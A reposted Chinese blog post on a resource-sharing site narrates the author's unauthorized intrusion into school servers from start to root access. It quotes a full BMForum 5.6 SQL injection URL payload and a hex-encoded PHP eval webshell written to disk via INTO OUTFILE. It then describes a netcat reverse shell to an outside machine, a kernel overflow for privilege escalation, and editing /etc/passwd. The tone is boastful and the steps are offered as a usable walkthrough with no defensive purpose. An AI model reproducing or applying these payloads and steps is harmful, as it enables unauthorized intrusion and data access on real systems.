也想出现在这里? 联系我们

linux系统从入侵到提权的详细过程(图文)

作者 : 小编 本文共1684个字,预计阅读时间需要5分钟 发布时间: 2021-06-15 共2.65K人阅读
也想出现在这里? 联系我们

前奏:无意间拿下了学校一台检测网络访问的服务器,无意间看到一个远程登录的信息,遂对此网段扫描了一下80端口。。。 上个J8,就是那个上网检测东西。。\\其实记录的很详细,没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的,所以只查看了一些上网行为。刚才说了,扫了一下那个网段的80端口,有一个开着,就点进去看了一下,是BMForum20075.6的论坛,php的。老系统了,记得前几年爆了个注入,也不知道是不是这个版本,上db-exploit看了一下,艹,中枪了。————————-下面的来自db-exploit————————BMForum5.6(tagname)RemoteSQLInjectionVulnerabilityAuthor:~!Dok_tOR!~Datefound:30.09.08Product:BMForumVersion:5.6URL:www.bmforum.comVulnerabilityClass:SQLInjectionCondition:magic_quotes_gpc=OffExploit:http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*#milw0rm.com[2008-10-01]\\于是乎….\\不用猜你就懂了,密码是admin。进后台了,这个模式我不是很喜欢,翻了半天没找到能上传的地方。上J8。\\不过,还是好好找,依然能找到可以利用的东西,发现了这个后台有phpinfo()和SQL执行。看了一下,是root权限,也得到了web目录,如果没开启魔术引号,可以考虑intooutfile。补一句:mysql的root权限在linux下一般没什么用,有写权限就不错了,如果是windows系统,可以考虑导出udf.dll。\\\\\\\\管理员百密一疏啊,没开魔术引号~~蛤蛤,大快人心!!~直接select一句话木马,然后导出到文件~~下面那一段十六进制字符串是www.jb51.net<?phpeval($_REQUEST[fuck]);?> 的hex值select0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3Eintooutfile‘/usr/local/bmf/bmb/datafile/x.php’\\然后成功得到shell。如图。\\接下来,试试菜刀里能不能执行命令,下面就要考虑提权了。试了一下,看似可以执行命令,也得到了一些服务器信息。\\2.6.9-22的内核,有溢出。这个终端有个毛病,就是不能即时回显,毕竟是通过webshell虚拟的终端,所以,还需要nc来反弹一个shell,用于溢出。这个服务器上已经装了nc,可是是阉割过的,不能指向bash,所以,下载源码,编译。用wget在sourceforge.net上下载,就不多说了。。编译什么的,也是soeasy。实在不行就百度一个i386架构下编译的linux版netcat。下面的工作就是要反弹shell了,一台外网的机子是必须的,就算不是外网,能映射也行。刚好手头有个映射过端口的服务器,如果是外网服务器,就更简单了,详见netcat使用帮助。http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html好了,开始反弹吧。。。\\\\很好,反弹成功,已经可以执行一些低权限的命令的。接着提权吧。上传了一个叫做“x”的程序,用于溢出。\\蛤蛤,溢出成功了,已经是root权限了,下面加用户什么的就不说了,你懂的~~唠叨一句,变身成root的方法。。。修改/etc/passwd\\这是我用pietty连接ssh之后,查看passwd,已经改成root了作者sunrise@luzix.com from:情\’blog

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » linux系统从入侵到提权的详细过程(图文)

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录